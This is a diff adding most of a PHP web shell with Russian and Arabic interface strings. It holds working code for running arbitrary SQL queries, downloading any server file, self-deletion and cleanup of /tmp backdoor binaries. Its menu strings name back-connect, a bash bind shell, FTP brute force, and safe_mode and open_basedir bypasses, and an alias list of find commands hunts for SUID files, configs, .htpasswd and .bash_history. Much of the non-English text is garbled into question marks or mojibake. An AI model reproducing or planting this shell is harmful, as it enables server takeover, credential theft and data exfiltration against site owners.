+            $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+            }
+    break;
+    case 'MSSQL':
+     $this->dump[0] = '## MSSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+           if(!$this->get_result()) return 0;
+           for($i=0;$i<$this->num_rows;$i++)
+            {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
+            $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+            }
+    break;
+    case 'PostgreSQL':
+     $this->dump[0] = '## PostgreSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+           if(!$this->get_result()) return 0;
+           for($i=0;$i<$this->num_rows;$i++)
+            {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
+            $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+            }
+    break;
+    case 'Oracle':
+      $this->dump[0] = '## ORACLE dump';
+      $this->dump[]  = '## under construction';
+    break;
+    default:
+     return 0;
+    break;
+    }
+   return 1;
+  }
+ function close()
+  {
+   switch($this->db)
+    {
+          case 'MySQL':
+           @mysql_close($this->connection);
+    break;
+    case 'MSSQL':
+     @mssql_close($this->connection);
+    break;
+    case 'PostgreSQL':
+     @pg_close($this->connection);
+    break;
+    case 'Oracle':
+     @oci_close($this->connection);
+    break;
+    }
+  }
+ function affected_rows()
+  {
+   switch($this->db)
+    {
+          case 'MySQL':
+           return @mysql_affected_rows($this->res);
+    break;
+    case 'MSSQL':
+     return @mssql_affected_rows($this->res);
+    break;
+    case 'PostgreSQL':
+     return @pg_affected_rows($this->res);
+    break;
+    case 'Oracle':
+     return @ocirowcount($this->res);
+    break;
+    default:
+     return 0;
+    break;
+    }
+  }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
+ {
+  if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
+  else
+   {
+    @ob_clean();
+    $filename = @basename($_POST['d_name']);
+    $filedump = @fread($file,@filesize($_POST['d_name']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
+    header("Content-type: ".$mime_type);
+    header("Content-disposition: attachment; filename=\"".$filename."\";");
+    echo $filedump;
+    exit();
+   }
+ }
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
+ {
+ echo $head;
+ $sql = new my_sql();
+ $sql->db   = $_POST['db'];
+ $sql->host = $_POST['db_server'];
+ $sql->port = $_POST['db_port'];
+ $sql->user = $_POST['mysql_l'];
+ $sql->pass = $_POST['mysql_p'];
+ $sql->base = $_POST['mysql_db'];
+ $querys = @explode(';',$_POST['db_query']);
+ echo '<body bgcolor=#000000>';
+ if(!$sql->connect()) echo "<div align=center><font face=tahoma size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
+  else
+   {
+   if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=tahoma size=-2 color=red><b>Can't select database</b></font></div>";
+   else
+    {
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5)
+      {
+      echo "<font face=tahoma size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
+      switch($sql->query($query))
+       {
+       case '0':
+       echo "<table width=100%><tr><td><font face=tahoma size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
+       break;
+       case '1':
+       if($sql->get_result())
+        {
+               echo "<table width=100%>";
+        foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
+               $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=tahoma size=-2><b>&nbsp;", $sql->columns);
+        echo "<tr><td bgcolor=#333333><font face=tahoma size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+        for($i=0;$i<$sql->num_rows;$i++)
+         {
+         foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
+         $values = @implode("&nbsp;</font></td><td><font face=tahoma size=-2>&nbsp;",$sql->rows[$i]);
+         echo '<tr><td><font face=tahoma size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
+         }
+        echo "</table>";
+        }
+       break;
+       case '2':
+       $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
+       echo "<table width=100%><tr><td><font face=tahoma size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
+       break;
+       }
+      }
+     }
+    }
+   }
+ echo "<br><form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_server',0,$_POST['db_server']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center>";
+ echo "<font face=tahoma size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
+ echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
+ echo "</form>";
+ echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+if(isset($_GET['delete']))
+ {
+   @unlink(__FILE__);
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.$key.'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+$lang=array(
+'ru_text1' =>'??????????? ???????',
+'ru_text2' =>'?????????? ?????? ?? ???????',
+'ru_text3' =>'????????? ???????',
+'ru_text4' =>'??????? ??????????',
+'ru_text5' =>'???????? ?????? ?? ??????',
+'ru_text6' =>'????????? ????',
+'ru_text7' =>'??????',
+'ru_text8' =>'???????? ?????',
+'ru_butt1' =>'?????????',
+'ru_butt2' =>'?????????',
+'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
+'ru_text10'=>'??????? ????',
+'ru_text11'=>'?????? ??? ???????',
+'ru_butt3' =>'???????',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-?????',
+'ru_text14'=>'????',
+'ru_butt4' =>'?????????',
+'ru_text15'=>'???????? ?????? ? ?????????? ???????',
+'ru_text16'=>'????????????',
+'ru_text17'=>'????????? ????',
+'ru_text18'=>'????????? ????',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'????????????',
+'ru_text21'=>'????? ???',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'????????? ????',
+'ru_text24'=>'????????? ????',
+'ru_text25'=>'????????? ????',
+'ru_text26'=>'????????????',
+'ru_butt5' =>'?????????',
+'ru_text28'=>'?????? ? safe_mode',
+'ru_text29'=>'?????? ????????',
+'ru_butt6' =>'???????',
+'ru_text30'=>'???????? ?????',
+'ru_butt7' =>'???????',
+'ru_text31'=>'???? ?? ??????',
+'ru_text32'=>'?????????? PHP ????',
+'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',
+'ru_butt8' =>'?????????',
+'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
+'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
+'ru_text36'=>'???? . ???????',
+'ru_text37'=>'?????',
+'ru_text38'=>'??????',
+'ru_text39'=>'????',
+'ru_text40'=>'???? ??????? ???? ??????',
+'ru_butt9' =>'????',
+'ru_text41'=>'????????? ? ?????',
+'ru_text42'=>'?????????????? ?????',
+'ru_text43'=>'????????????? ????',
+'ru_butt10'=>'?????????',
+'ru_butt11'=>'?????????????',
+'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
+'ru_text45'=>'???? ????????',
+'ru_text46'=>'???????? phpinfo()',
+'ru_text47'=>'???????? ???????? php.ini',
+'ru_text48'=>'???????? ????????? ??????',
+'ru_text49'=>'???????? ??????? ? ???????',
+'ru_text50'=>'?????????? ? ??????????',
+'ru_text51'=>'?????????? ? ??????',
+'ru_text52'=>'????? ??? ??????',
+'ru_text53'=>'?????? ? ?????',
+'ru_text54'=>'????? ?????? ? ??????',
+'ru_butt12'=>'?????',
+'ru_text55'=>'?????? ? ??????',
+'ru_text56'=>'?????? ?? ???????',
+'ru_text57'=>'???????/??????? ????/??????????',
+'ru_text58'=>'???',
+'ru_text59'=>'????',
+'ru_text60'=>'??????????',
+'ru_butt13'=>'???????/???????',
+'ru_text61'=>'???? ??????',
+'ru_text62'=>'?????????? ???????',
+'ru_text63'=>'???? ??????',
+'ru_text64'=>'?????????? ???????',
+'ru_text65'=>'???????',
+'ru_text66'=>'???????',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'???????',
+'ru_text69'=>'????????1',
+'ru_text70'=>'????????2',
+'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
+'ru_text72'=>'????? ??? ??????',
+'ru_text73'=>'?????? ? ?????',
+'ru_text74'=>'?????? ? ??????',
+'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
+'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
+'ru_text80'=>'???',
+'ru_text81'=>'????',
+'ru_text82'=>'???? ??????',
+'ru_text83'=>'?????????? SQL ???????',
+'ru_text84'=>'SQL ??????',
+'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
+'ru_text86'=>'?????????? ????? ? ???????',
+'ru_butt14'=>'???????',
+'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????',
+'ru_text88'=>'FTP-??????:????',
+'ru_text89'=>'???? ?? ftp ???????',
+'ru_text90'=>'????? ????????',
+'ru_text91'=>'???????????? ?',
+'ru_text92'=>'??? ?????????',
+'ru_text93'=>'FTP',
+'ru_text94'=>'FTP-????????',
+'ru_text95'=>'?????? ?????????????',
+'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',
+'ru_text97'=>'????????? ??????????: ',
+'ru_text98'=>'??????? ???????????: ',
+'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd',
+'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',
+'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????',
+'ru_text102'=>'?????',
+'ru_text103'=>'???????? ??????',
+'ru_text104'=>'???????? ????? ?? ???????? ????',
+'ru_text105'=>'????',
+'ru_text106'=>'??',
+'ru_text107'=>'????',
+'ru_butt15'=>'?????????',
+'ru_text108'=>'????? ??????',
+'ru_text109'=>'????????',
+'ru_text110'=>'??????????',
+'ru_text111'=>'SQL-?????? : ????',
+'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail',
+'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list',
+'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body',
+'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? compress.zlib:// ? copy()',
+'ru_text116'=>'?????????? ????',
+'ru_text117'=>'?',
+'ru_text118'=>'???? ??????????',
+'ru_text119'=>'?? ??????? ??????????? ????',
+'ru_err0'=>'??????! ?? ???? ???????? ? ???? ',
+'ru_err1'=>'??????! ?? ???? ????????? ???? ',
+'ru_err2'=>'??????! ?? ??????? ??????? ',
+'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????',
+'ru_err4'=>'?????? ??????????? ?? ftp ???????',
+'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????',
+'ru_err6'=>'??????! ?? ??????? ????????? ??????',
+'ru_err7'=>'?????? ??????????',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'ÇáÇãÑ ÇáãäİĞ',
+'eng_text2' =>'ÊäİíĞ ÇáÇæÇãÑ İí ÇáÓíÑİÑ',
+'eng_text3' =>'ÇãÑ ÇáÊÔÛíá',
+'eng_text4' =>'ãßÇä Úãáß ÇáÇä Úáì ÇáÓíÑİÑ',
+'eng_text5' =>'ÑİÚ ãáİ Çáì ÇáÓíÑİÑ',
+'eng_text6' =>'ãÓÇÑ ãáİß',
+'eng_text7' =>'ÇæÇãÑ ÌÇåÒå',
+'eng_text8' =>'ÇÎÊÑ ÇáÇãÑ',
+'eng_butt1' =>'ÊäİíĞ',
+'eng_butt2' =>'ÑİÜÚ',
+'eng_text9' =>'İÊÍ ÈæÑÊ İí ÇáÓíÑİÑ Úáì /bin/bash',
+'eng_text10'=>'ÈÜæÑÊ',
+'eng_text11'=>'ÈÇÓæÑÏ ááÏÎæá',
+'eng_butt3' =>'İÊÍ',
+'eng_text12'=>'ÃÊÕÜÇá ÚÜßÓí',
+'eng_text13'=>'ÇáÇí Èí',
+'eng_text14'=>'ÇáãäİĞ',
+'eng_butt4' =>'ÃÊÜÕÇá',
+'eng_text15'=>'ÓÍÈ ãáİÇÊ Çáì ÇáÓíÑİÑ',
+'eng_text16'=>'Úä ØÑíŞ',
+'eng_text17'=>'ÑÇÈØ Çáãáİ',
+'eng_text18'=>'ãßÇä äÒæáå',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'ÅÓÊÎÏã',
+'eng_text21'=>'&nbsp;ÇáÇÓã ÇáÌÏíÏ',
+'eng_text22'=>'ÇäÈæÈ ÇáÈíÇäÇÊ',
+'eng_text23'=>'ÇáÈæÑÊ ÇáãÍáí',
+'eng_text24'=>'ÇáÓíÑİÑ ÇáÈÚíÏ',
+'eng_text25'=>'ÇáãäİĞ ÇáÈÚíÏ',
+'eng_text26'=>'ÇÓÊÎÏã',
+'eng_butt5' =>'ÊÔÛíá',
+'eng_text28'=>'ÇáÚãá İí ÇáæÖÚ ÇáÇãä',
+'eng_text29'=>'ããäæÚ ÇáÏÎæá',
+'eng_butt6' =>'ÊÛíÑ',
+'eng_text30'=>'ÚÑÖ ãáİ',
+'eng_butt7' =>'ÚÑÖ',
+'eng_text31'=>'Çáãáİ ÛíÑ ãæÌæÏ',
+'eng_text32'=>'ÊäİíĞ ßæÏ php Úä ØÑíŞ ÏÇáå eval',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'ÇÎÊÈÇÑ',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'ÇáŞÇÚÏÉ . ÇáÌÏæá',
+'eng_text37'=>'ÇÓã ÇáãÓÊÎÏã',
+'eng_text38'=>'ßáãÉ ÇáãÑæÑ',
+'eng_text39'=>'ÇáŞÇÚÏÉ',
+'eng_text40'=>'äÓÎÉ ãä ÌÏÇæá ÇáŞÇÚÏÉ',
+'eng_butt9' =>'äÓÎÉ',
+'eng_text41'=>'ÍİÙ ÇáäÓÎÉ İí',
+'eng_text42'=>'ÊÚÏíá ÇáãáİÇÊ',
+'eng_text43'=>'Çáãáİ ÇáãÑÇÏ ÊÚÏíáå',
+'eng_butt10'=>'ÍİÙ',
+'eng_text44'=>'áÇÊÓÊØíÚ ÇáÊÚÏíá Úáì åĞÇ Çáãáİ İŞØ ÊŞÑÃ',
+'eng_text45'=>'Êã ÇáÍİÙ',
+'eng_text46'=>'ÚÑÖ phpinfo()',
+'eng_text47'=>'ÑÄíÉ ÇáãÊÛíÑÇÊ İí php.ini',
+'eng_text48'=>'ãÓÍ ãáİÇÊ ÇáÜ temp',
+'eng_butt11'=>'ÊÍÑíÑ Çáãáİ',
+'eng_text49'=>'ãÓÍ ÇáÓßÑÈÊ ãä ÇáÓíÑİÑ',
+'eng_text50'=>'ÚÑÖ ãÚáæãÇÊ ÇáĞÇßÑÉ ÇáÑÆíÓíÉ',
+'eng_text51'=>'ÚÑÖ ãÚáæãÇÊ ÇáĞÇßÑÉ',
+'eng_text52'=>'ÈÍË äÕ',
+'eng_text53'=>'İí ÇáãÓÇÑ',
+'eng_text54'=>'ÈÍË Úä äÕ İí ÇáãáİÇÊ',
+'eng_butt12'=>'ÈÍË',
+'eng_text55'=>'İŞØ İí ÇáãáİÇÊ',
+'eng_text56'=>'áÇíæÌÏ :(',
+'eng_text57'=>'ÇäÔÇÁ/ãÓÍ ãáİ/ãÌáÏ',
+'eng_text58'=>'ÇáÇÓã',
+'eng_text59'=>'ãáİ',
+'eng_text60'=>'ãÌáÏ',
+'eng_butt13'=>'ÅäÔÇÁ /ãÓÍ',
+'eng_text61'=>'Êã ÅäÔÇÁ Çáãáİ',
+'eng_text62'=>'Êã ÅäÔÇÁ ÇáãÌáÏ',
+'eng_text63'=>'Êã ãÓÍ Çáãáİ',
+'eng_text64'=>'Êã ãÓÍ ÇáãÌáÏ',
+'eng_text65'=>'ÅäÔÇÁ',
+'eng_text66'=>'ãÓÍ',
+'eng_text67'=>'ÇáÊÕÑíÍ/ÇáãÓÊÎÏã/ÇáãÌãæÚÉ',
+'eng_text68'=>'ÇãÑ',
+'eng_text69'=>'ÅÓã Çáãáİ',
+'eng_text70'=>'ÇáÊÕÑíÍ',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'ÇáäÕ ÇáãÑÇÏ',
+'eng_text73'=>'ÈÍË İí ÇáãÌáÏÇÊ',
+'eng_text74'=>'ÈÍË İí ÇáãáİÇÊ',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'ÇáÈÍË Úä äÕ İí ãáİÇÊ ÈæÇÓØå find',
+'eng_text80'=>'ÇáäæÚ',
+'eng_text81'=>'ÇáÅÊÕÇáÇÊ',
+'eng_text82'=>'ŞæÇÚÏ ÇáÈíÇäÇÊ',
+'eng_text83'=>'ÊÔÛíá ÇãÑ ÇÓÊÚáÇã',
+'eng_text84'=>'ÇÓÊÚáÇã ŞÇÚÏÉ',
+'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
+'eng_text86'=>'ÊäÒíá ãáİÇÊ ãä ÇáÓíÑİÑ',
+'eng_butt14'=>'ÊÍãíá',
+'eng_text87'=>'ÊäÒíá ãáİÇÊ ãä ÎÇÏã ÇáÇİ Êí Èí',
+'eng_text88'=>'ÓíÑİÑ ÇáÇİ Êí Èí:ÇáãäİĞ',
+'eng_text89'=>'ãáİ İí ÇáÇİ Êí Èí',
+'eng_text90'=>'ÇáÊÍæíá Çáì',
+'eng_text91'=>'ÇÑÔİÉ',
+'eng_text92'=>'ãä ÛíÑ ÇáÇÑÔİÉ',
+'eng_text93'=>'ÇáÇİ Êí Èí',
+'eng_text94'=>'ÊÎãíä ÇáÇİ Êí Èí',
+'eng_text95'=>'ŞÇÆãÉ ÇáãÓÊÎÏãíä',
+'eng_text96'=>'áã íÓÊØÚ ÓÍÈ ŞÇÆãÉ ÇáãÓÊÎÏãíä',
+'eng_text97'=>'Êã ÇáİÍÕ: ',
+'eng_text98'=>'Êã ÈäÌÇÍ: ',
+'eng_text99'=>'* ÇÓÊÎÏã ÇÓãÇÁ ÇáãÓÊÎÏãíä İí ãáİ /etc/passwd áÏÎæá ááÜ ftp',
+'eng_text100'=>'ÇÑÓÇá ãáİ Çáì ÎÇÏã ÇáÇİ Êí Èí',
+'eng_text101'=>'ÇÓÊÎÏã ÇáÇÓÇãí ãÚßæÓå áÊÎãíäåÇ',
+'eng_text102'=>'ÎÏãÇÊ ÇáÈÑíÏ',
+'eng_text103'=>'ÇÑÓÇá ÈÑíÏ',
+'eng_text104'=>'ÇÑÓÇá ãáİ Çáì ÇáÇíãíá',
+'eng_text105'=>'Åáì',
+'eng_text106'=>'ãÜä',
+'eng_text107'=>'ÇáãæÖæÚ',
+'eng_butt15'=>'ÅÑÓÇá',
+'eng_text108'=>'ÇáÑÓÇáÉ',
+'eng_text109'=>'ãÎİí',
+'eng_text110'=>'ÚÑÖ',
+'eng_text111'=>'ÓíÑİÑ ŞæÇÚÏ ÇáÈíÇäÇÊ : ÇáãäİĞ',
+'eng_text112'=>'ŞÑÇÆÉ ÇáãáİÇÊ Úä ØÑíŞ ËÛÑÉ ÏÇáå mb_send_mail',
+'eng_text113'=>'ŞÑÇÆÉ ãÍÊæì ÇáãÌáÏÇÊ Úä ØÑíŞ via imap_list',
+'eng_text114'=>'ŞÑÇÆÉ ÇáãáİÇÊ Úä ØÑíŞ ËÛÑÉ via imap_body',
+'eng_text115'=>'ŞÑÇÆÉ ÇáãáİÇÊ Úä ØÑíŞ compress.zlib://',
+'eng_text116'=>'äÓÎ ãä',
+'eng_text117'=>'Çáì',
+'eng_text118'=>'Êã äÓÎ Çáãáİ',
+'eng_text119'=>'áÇíÓÊØíÚ ÇáäÓÎ',
+'eng_err0'=>'ÎØÇÁ ! áÇíãßä ÇáßÊÇÈÉ Úáì åĞÇ Çáãáİ ',
+'eng_err1'=>'ÎØÇÁ ! ÛíÑ ŞÇÏÑ Úáì ŞÑÇÆå åĞÇ Çáãáİ ',
+'eng_err2'=>'ÎØÇÁ! áÇíãßä ÇáÇäÔÇÁ ',
+'eng_err3'=>'ÎØÇÁ! ÛíÑ ŞÇÏÑ Úáì ÇáÇÊÕÇá ÈÇáÇİ Êí Èí',
+'eng_err4'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÇáÏÎæá Çáì ÓíÑİÑ ÇáÇİ Êí Èí',
+'eng_err5'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÊÛíÑ ÇáãÌáÏ İí ÇáÇİ Êí Èí',
+'eng_err6'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÇÑÓÇá ÑÓÇáå',
+'eng_err7'=>'ÇáÈÑíÏ ÇÑÓá',
+'eng_text200'=>'ŞÑÇÆÉ ÇáãáİÇÊ Úä ØÑíŞ ËÛÑÉ copy()',
+'eng_text202'=>'ãÓÇÑ Çáãáİ ÇáãÑÇÏ ŞÑÇÆÊå',
+'eng_text300'=>'ŞÑÇÆå ÇáãáİÇÊ Úä ØÑíŞ ËÛÑÉ curl()',
+'eng_text302'=>'ãÓÇÑ Çáãáİ ÇáãÑÇÏ ŞÑÇÆÊå',
+);
+/*
+?????? ??????
+????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
+?? ?????? ???? ????????? ??? ???????? ???????.
+*/
+$aliases=array(
+'ÇáÈÍË Úä ãáİÇÊ suid'=>'find / -type f -perm -04000 -ls',
+'ÇáÈÍË Úä ãáİÇÊ suid İí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -perm -04000 -ls',
+'ÇáÈÍË Úä ãáİÇÊ suid'=>'find / -type f -perm -02000 -ls',
+'ÇáÈÍË Úä ãáİÇÊ suid İí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -perm -02000 -ls',
+'ÇáÈÍË Úä ãáİÇÊ config.inc.php'=>'find / -type f -name config.inc.php',
+'ÇáÈÍË Úä ãáİÇÊ config.inc.php İí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -name config.inc.php',
+'ÇáÈÍË Úä ãáİÇÊ config* ÈÌãíÚ ÇáÇãÊÏÇÏÇÊ'=>'find / -type f -name "config*"',
+'ÇáÈÍË Úä ãáİÇÊ config* İí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -name "config*"',
+'ÇáÈÍË Úä ÇáãáİÇÊ ÇáŞÇÈáÉ ááßÊÇÈÉ'=>'find / -type f -perm -2 -ls',
+'ÇáÈÍË Úä ÇáãáİÇÊ ÇáŞÇÈáÉ ááßÊÇÈÉ İí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -perm -2 -ls',
+'ÇáÈÍË Úä ÇáãÌáÏÇÊ ÇáŞÇÈáÉ ááßÊÇÈÉ'=>'find /  -type d -perm -2 -ls',
+'ÇáÈÍË Úä ÇáãÌáÏÇÊ ÇáŞÇÈáÉ ááßÊÇÈÉ İí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type d -perm -2 -ls',
+'ÇáÈÍË Úä ãáİÇÊ æãÌáÏÇÊ ŞÇÈáÉ ááßÊÇÈÉ'=>'find / -perm -2 -ls',
+'ÇáÈÍË Úä ãáİÇÊ æãÌáÏÇÊ İí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -perm -2 -ls',
+'ÇáÈÍË Úä ãáİÇÊ service.pwd'=>'find / -type f -name service.pwd',
+'ÇáÈÍË Úä ãáİÇÊ service.pwd İí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name service.pwd',
+'ÇáÈÍË Úä ßá ãáİÇÊ ÇáÌÏÑÇä ÇáäÇÑíÉ .htpasswd'=>'find / -type f -name .htpasswd',
+'ÇáÈÍË Úä ÌãíÚ ãáİÇÊ ÇáÌÏÑÇä ÇáäÇÑíÉ İí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name .htpasswd',
+'ÇáÈÍË Úä ÌãíÚ ãáİÇÊ .bash_history'=>'find / -type f -name .bash_history',
+'ÇáÈÍË Úä ÌãíÚ ãáİÇÊ .bash_history İí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name .bash_history',
